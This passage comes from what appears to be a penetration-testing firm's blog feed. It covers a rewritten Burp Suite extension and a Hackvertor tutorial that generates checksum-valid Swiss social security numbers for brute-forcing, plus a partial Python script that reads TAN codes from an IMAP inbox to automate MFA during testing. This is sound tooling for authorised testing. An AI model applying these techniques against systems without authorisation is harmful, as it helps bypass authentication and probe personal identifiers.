&lt;p&gt;In the last few months we've been busy improving some of our own tools. One of them was the Response Overview (used to be called "Response Clusterer") Burp extension. We did a complete rewrite from Jython to Kotlin. Jython has some huge compatibility issues inside Burp, just to mention some of them:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Extensions break depending on if Jython version 2.7.0 or 2.7.2 is installed.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Type issues as Jython needs to convert Java arrays to Python string, which is not trivial in deeply-nested objects.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Jython is not available for Python 3, which is okay, but when our extensions grew large, we missed the type hinting feature of Python 3.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Cool features of Kotlin such as null-checking or automatically generated getter and setter methods are missing.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The only real downside we see is that Kotlin extensions need to be compiled before they can be used, whereas changing a line in a Python script is much easier.&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202201_burp_response_overview.png"&gt;
&lt;img alt="Screenshot of the Response Overview Burp plugin" class="align-center" src="https://www.pentagrid.ch/images/202201_burp_response_overview.thumbnail.png"&gt;
&lt;/a&gt;
&lt;p&gt;This extension groups all response bodies by similarity and shows a summary, one request/response per group. The extension will allow a tester to get an overview of the tested website's responses from all tools (scanner, proxy, etc.). It provides an additional "semi-automated detection method" (compared to the usual detection methods response-based, time-based, interaction-based, etc.).&lt;/p&gt;
&lt;p&gt;The new Response Overview extension has some huge memory, performance and UI improvements. This includes being able to sort the overview table as well as hiding items in it.&lt;/p&gt;
&lt;p&gt;Moreover, according to Portswigger, this was the first Kotlin-only extension that was submitted to the Burp internal BApp store. They changed their build-pipeline to make sure Kotlin extensions can be auto-built in the future when submitted to the BApp store. So if you write an extension in Kotlin, make sure to have a look at our &lt;a class="reference external" href="https://github.com/pentagridsec/PentagridResponseOverview"&gt;Github repository&lt;/a&gt;. Moreover, include the API files found in the &lt;a class="reference external" href="https://github.com/bao7uo/burp-extender-api-kotlin"&gt;burp-extender-api-kotlin Github repository&lt;/a&gt; as we did in the Response Overview extension.&lt;/p&gt;
&lt;p&gt;During the journey of learning Kotlin and writing the extension, we encountered two annoying Kotlin compiler bugs. &lt;a class="reference external" href="https://youtrack.jetbrains.com/issue/KT-6653"&gt;One bug&lt;/a&gt; could be circumvented because Portswigger agreed that Kotlin extension can provide their own API files (see above). The &lt;a class="reference external" href="https://youtrack.jetbrains.com/issue/KT-19861"&gt;other bug&lt;/a&gt; was fixed when a new compiler version came out. We still haven't figured out another Serialization bug we encountered. So if you are a Java/Kotlin wizard, we would also be interested to hear from you why the Java Serialization (or rather the deserialization) of the boolean "hidden" flag in the &lt;a class="reference external" href="https://github.com/pentagridsec/PentagridResponseOverview/blob/main/src/main/kotlin/LogEntry.kt"&gt;LogEntry&lt;/a&gt; class is not working (hidden flag is always false when deserialized).&lt;/p&gt;
&lt;p&gt;The &lt;a class="reference external" href="https://github.com/pentagridsec/PentagridResponseOverview"&gt;Github repository&lt;/a&gt; also features more technical information about the extension. The extension can be found in BApp now and the BApp store listing can be found on the &lt;a class="reference external" href="https://portswigger.net/bappstore/e63f09f290ad4d9ea20031e84767b303"&gt;Portswigger website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Have fun with the extension and happy bug hunting!&lt;/p&gt;</description><category>API</category><category>Burp</category><category>Extensions</category><category>Grouping</category><category>Overview</category><category>Pentesting</category><category>Portswigger</category><guid>https://www.pentagrid.ch/en/blog/response_overview_burp_extension/</guid><pubDate>Wed, 12 Jan 2022 13:30:00 GMT</pubDate></item><item><title>Burp Suite  - solving E-mail and SMS TAN multi-factor authentication with Hackvertor custom tags</title><link>https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;Why bother investing time to automate work when doing IT security testing? On one hand,
manual testing is a tedious work, where you spend time doing vulnerability tests that
could be done by a machine. On the other hand, letting a machine decide fully on its
own on how to do tests will mostly result in the machine doing nothing useful. This
is especially true for security testing, where manually checking every parameter for
injection attacks is very laborious and automated security scanners go on scanning
for hours while a human would have aborted the scan for various reasons. However,
if we teach automated tools to do things correctly each time, we get the sweet middle
spot of semi-automated security testing, where the tools do the automatic and systematic
security tests and the analyst can focus on the parts of a security test, where the tools
are likely insufficient.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="https://portswigger.net"&gt;Burp Suite Pro&lt;/a&gt; is one of the main tools to do all kind of
HTTP related security analysis and that supports a semi-automated testing. But now
and then it lacks certain features. Burp
extensions can again add some of them. In this post we would like to show how to use
one of the most powerful extensions, &lt;a class="reference external" href="https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100"&gt;Hackvertor&lt;/a&gt;
by &lt;a class="reference external" href="https://twitter.com/garethheyes"&gt;Gareth Hayes&lt;/a&gt; and its relatively new feature
of Python scripting.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="use-hackvertor-to-generate-swiss-social-security-numbers"&gt;
&lt;h2&gt;Use Hackvertor to generate Swiss social security numbers&lt;/h2&gt;
&lt;p&gt;Let's start with a simple example. Imagine you are security testing a website and you
found an HTTP-API that expects the de facto Swiss social security number &lt;a class="brackets" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#ahv" id="footnote-reference-1" role="doc-noteref"&gt;&lt;span class="fn-bracket"&gt;[&lt;/span&gt;1&lt;span class="fn-bracket"&gt;]&lt;/span&gt;&lt;/a&gt; as a
parameter. Nearly every adult in Switzerland has such a number. After
researching, you find out this unique number always starts with 756, followed by two
times four random characters and ending with another two random characters like this:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_0a10fc73f5214b6cbc6e043af6c7ce84-1" name="rest_code_0a10fc73f5214b6cbc6e043af6c7ce84-1" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_0a10fc73f5214b6cbc6e043af6c7ce84-1"&gt;&lt;/a&gt;756.9217.0769.85
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you would just like to brute-force random social security numbers in HTTP requests,
you could use Burp's Intruder feature that allows you to try generate different numbers.
But what if you would like to send a new random number each time you send the request in
Burp's Repeater? This is where Hackvertor can be used. In Hackvertor's UI you can search
for tags and you should quickly find the &lt;code class="docutils literal"&gt;random_num&lt;/code&gt; tag. The purpose is simply to
generate a random number as shown in the input and output field in the following picture:&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202103_burp_hackvertor_1_hackvertor_randomnum.png"&gt;
&lt;img alt="Screenshot of the Burp Hackvertor showing the random_num Hackvertor tag in the input window and and a random number in the output widget." class="align-center" src="https://www.pentagrid.ch/images/202103_burp_hackvertor_1_hackvertor_randomnum.thumbnail.png" style="width: 100%;"&gt;
&lt;/a&gt;
&lt;p&gt;So generating a new random social security number is as easy as pasting the following value
into an HTTP request in Burp's Repeater:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_9777fa44ad7c42efb43ddc77ee36fbaf-1" name="rest_code_9777fa44ad7c42efb43ddc77ee36fbaf-1" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_9777fa44ad7c42efb43ddc77ee36fbaf-1"&gt;&lt;/a&gt;756.&amp;lt;@random_num_0(4) /&amp;gt;.&amp;lt;@random_num_1(4) /&amp;gt;.&amp;lt;@random_num_2(2) /&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For example, the following request can be created in the Burp Repeater:&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202103_burp_hackvertor_2_repeater_hackvertor_randomnum.png"&gt;
&lt;img alt="Screenshot of the Burp Repeater showing several random_num Hackvertor tags in a HTTP request to create a Swiss social security number." class="align-center" src="https://www.pentagrid.ch/images/202103_burp_hackvertor_2_repeater_hackvertor_randomnum.thumbnail.png" style="width: 700px;"&gt;
&lt;/a&gt;
&lt;p&gt;However, it will not be sent out from Burp as-is and the tags will be replaced by
Hackvertor. How does an example request look like when it leaves Burp? This can be
observed in the Logger++ extension (another very helpful extension you should use)
as shown in the following picture:&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202103_burp_hackvertor_3_loggerpp_replaced_values.png"&gt;
&lt;img alt="Screenshot of the Burp Logger++ logging widget showing a HTTP request with a Swiss social security number generated by the Hackvertor tags that have been inserted into the Burp Repeater." class="align-center" src="https://www.pentagrid.ch/images/202103_burp_hackvertor_3_loggerpp_replaced_values.thumbnail.png" style="width: 700px;"&gt;
&lt;/a&gt;
&lt;p&gt;This was just an easy example to start. But the truth is, Swiss social security numbers
are not fully random and the last character is an EAN13 checksum over the other characters.
And instead of sending incorrect social security numbers to a website, how about
calculating that checksum in Hackvertor? That's where custom Hackvertor code execution
tags come into play. You can write them in JavaScript or Python, we'll use Python here.
Hackvertor code execution tags allow you to write code that takes an input (passed in
the variable &lt;code class="docutils literal"&gt;input&lt;/code&gt;, that's whatever is put between the tags) and define the &lt;code class="docutils literal"&gt;output&lt;/code&gt;
variable. A no-transformation example looks like this:&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202103_burp_hackvertor_4_hackvertor_no_transformation.png"&gt;
&lt;img alt="Screenshot of the Hackvertor widget showing a dialog for the creation of a custom tag. You select Python as language and can enter program code into a text area. Currently the text area just assigns the input to the output." class="align-center" src="https://www.pentagrid.ch/images/202103_burp_hackvertor_4_hackvertor_no_transformation.thumbnail.png" style="width: 400px;"&gt;
&lt;/a&gt;
&lt;p&gt;So here's a little Python one-liner that calculates the checksum number from the nine
random numbers that were passed as &lt;code class="docutils literal"&gt;input&lt;/code&gt; and assigns the value to the variable &lt;code class="docutils literal"&gt;output&lt;/code&gt;:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_e218f2601b5c4190aed9e522c925546b-1" name="rest_code_e218f2601b5c4190aed9e522c925546b-1" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_e218f2601b5c4190aed9e522c925546b-1"&gt;&lt;/a&gt;z=input;y=z.replace('.','');output=z+str(10-(sum([3*int(x) for x in y[1:][::-2]])+sum([int(x) for x in y[::-1][1::2]]))%10)[-1]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Defining it as the tag name &lt;code class="docutils literal"&gt;ean13&lt;/code&gt; and you should get the following picture when
you open the tag in the edit window:&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202103_burp_hackvertor_5_hackvertor_ean13.png"&gt;
&lt;img alt="Screenshot of the Hackvertor widget for editing a custom tag. It is the same dialog type as above, but now it edits the ``ean13`` tag with the Python code shown above." class="align-center" src="https://www.pentagrid.ch/images/202103_burp_hackvertor_5_hackvertor_ean13.thumbnail.png" style="width: 400px;"&gt;
&lt;/a&gt;
&lt;p&gt;Note that the leading underscore is used for every custom tag, so Hackvertor knows it is
not a built-in Hackvertor tag. So how do we use such a custom tag?&lt;/p&gt;
&lt;p&gt;First of all, there is a security measure so other people that send traffic through your
Burp can't execute the custom tag on your Burp machine. Code execution tags are only
executed when a certain random token is included in the tag. This means you'll need to
create a custom tag in the Hackvertor UI first to get that random token. Creating the
custom tag for our &lt;code class="docutils literal"&gt;ean13&lt;/code&gt; tag in the Hackvertor UI will result in something like this:&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202103_burp_hackvertor_6_hackvertor_random_token.png"&gt;
&lt;img alt="Screenshot of the Hackvertor Burp plugin showing an EAN13 tag and with an error message in the output window. The error message describes that code execution is disabled and how to enable it." class="align-center" src="https://www.pentagrid.ch/images/202103_burp_hackvertor_6_hackvertor_random_token.thumbnail.png" style="width: 100%;"&gt;
&lt;/a&gt;
&lt;p&gt;So keep in mind that for your Burp installation, that random number in double qutoes will
be different. As the output windows in the above picture tells you, code execution tags
are still disabled by default for security reasons. This is a second setting you'll need
to change. You can enable them in the top main menu of Burp under the Hackvertor item.
What you need to do then is to allow code execution tags in Hackvertor:&lt;/p&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202103_burp_hackvertor_7_hackvertor_in_toplevel_menu.png"&gt;
&lt;img alt="Screenshot of the Hackvertor menu showing how to enable code execution tags." class="align-center" src="https://www.pentagrid.ch/images/202103_burp_hackvertor_7_hackvertor_in_toplevel_menu.thumbnail.png" style="width: 300px;"&gt;
&lt;/a&gt;
&lt;p&gt;After that you will probably not see much in the output window of Hackvertor. That's because
we have to give our custom tag the correct input. For example:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_7aae1655da1440078939628d0894d749-1" name="rest_code_7aae1655da1440078939628d0894d749-1" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_7aae1655da1440078939628d0894d749-1"&gt;&lt;/a&gt;&amp;lt;@_ean13_3("83a52168fad35b2d85f6972b0eb1db91")&amp;gt;756.9217.0769.8&amp;lt;/@_ean13_3&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now you should see the correct social security number being generated, namely 756.9217.0769.85.
And here comes the real power of Hackvertor. Now you can combine the generation of random
numbers feature of Hackvertor and our custom tag in a nested form:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_145981cd81bf4c8088ce940c4aed96c8-1" name="rest_code_145981cd81bf4c8088ce940c4aed96c8-1" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_145981cd81bf4c8088ce940c4aed96c8-1"&gt;&lt;/a&gt;&amp;lt;@_ean13_3("83a52168fad35b2d85f6972b0eb1db91")&amp;gt;756.&amp;lt;@random_num_0(4) /&amp;gt;.&amp;lt;@random_num_1(4) /&amp;gt;.&amp;lt;@random_num_2(1) /&amp;gt;&amp;lt;/@_ean13_3&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Whenever you send this value in the Burp Repeater, it will be replaced with a random social
security number with a correct checksum. Of course you can now not only generate random social
security numbers, but you can also generate the random numbers with Burp Intruder and brute-force
with valid EAN13 checksums.&lt;/p&gt;
&lt;p&gt;In some cases it might be even possible to simply paste the above tags into the browser you use with
Burp and the web server will receive a random social security number. However, this only works if the
web application you are testing does not encode the values we put into HTML fields and Hackvertor is
still able to see the tag exactly as written above. This is rather a rare case, but it might work.&lt;/p&gt;
&lt;p&gt;Update 2024-12-06: The &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/hackervertor-ean13-and-totp-tags-for-web-application-penetration-testing-with-burp/"&gt;EAN-13 tag is available via the Hackvertor tag store&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="use-hackvertor-to-fetch-second-factor-authentication-token"&gt;
&lt;h2&gt;Use Hackvertor to fetch second-factor authentication token&lt;/h2&gt;
&lt;p&gt;Let's do a more advanced custom tag example. Could you use the scripting capabilities of Hackvertor
to automatically solve TAN second factor verification in multi-factor authentication web forms? At
Pentagrid we have an &lt;a class="reference external" href="https://www.pentagrid.ch/en/blog/open-source-sms-gateway-for-pentest-projects/"&gt;SMS to E-mail gateway for pentesting purposes&lt;/a&gt;, meaning if second factor TANs are
sent out via SMS or E-mail, they will always land in one of our testing E-mail inboxes. Can we
retrieve the second factor TAN tokens from the E-mail inbox with a Hackvertor tag? Yes we can, with
the very useful Python &lt;code class="docutils literal"&gt;imaplib&lt;/code&gt; and an E-mail server that supports IMAP. Of course the entire
parsing logic for the incoming TANs is highly dependent on the web application and how the SMS or
E-mails look like. You will need to change the parsing code according to your needs. So here's a
quick'n'dirty example that worked for us for a certain web application. We created the new Hackvertor
tag like this:&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code python"&gt;&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-1" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-1" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-1"&gt;&lt;/a&gt;&lt;span class="kn"&gt;import&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;getpass&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;imaplib&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-2" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-2" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-2"&gt;&lt;/a&gt;&lt;span class="kn"&gt;import&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nn"&gt;time&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-3" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-3" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-3"&gt;&lt;/a&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-4" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-4" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-4"&gt;&lt;/a&gt;&lt;span class="n"&gt;time&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;0.1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-5" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-5" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-5"&gt;&lt;/a&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-6" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-6" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-6"&gt;&lt;/a&gt;&lt;span class="k"&gt;class&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nc"&gt;Email&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-7" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-7" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-7"&gt;&lt;/a&gt;    &lt;span class="k"&gt;def&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="fm"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-8" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-8" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-8"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-9" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-9" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-9"&gt;&lt;/a&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:])&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-10" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-10" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-10"&gt;&lt;/a&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-11" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-11" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-11"&gt;&lt;/a&gt;&lt;span class="n"&gt;M&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;imaplib&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IMAP4_SSL&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'use-your-own-mail-host'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="c1"&gt;# warning: no certificate verification&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-12" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-12" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-12"&gt;&lt;/a&gt;&lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;login&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"pentagrid@example.org"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"email-password"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-13" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-13" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-13"&gt;&lt;/a&gt;&lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;select&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-14" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-14" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-14"&gt;&lt;/a&gt;&lt;span class="n"&gt;typ&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;search&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;None&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'ALL'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-15" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-15" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-15"&gt;&lt;/a&gt;&lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"NO TOKEN WAS FOUND"&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-16" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-16" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-16"&gt;&lt;/a&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;num&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;split&lt;/span&gt;&lt;span class="p"&gt;()[::&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-17" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-17" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-17"&gt;&lt;/a&gt;    &lt;span class="n"&gt;typ&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;M&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;fetch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;num&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'(RFC822)'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-18" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-18" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-18"&gt;&lt;/a&gt;    &lt;span class="n"&gt;email&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Email&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;][&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;a id="rest_code_aae1983aaba646c78e710a6dd7fa15a4-19" name="rest_code_aae1983aaba646c78e710a6dd7fa15a4-19" href="https://www.pentagrid.ch/en/blog/burp-suite-hackvertor-custom-tags-email-sms-tan-multi-factor-authentication/#rest_code_aae1983aaba646c78e710a6dd7fa15a4-19"&gt;&lt;/a&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;line&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;email&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;body&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;splitlines&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
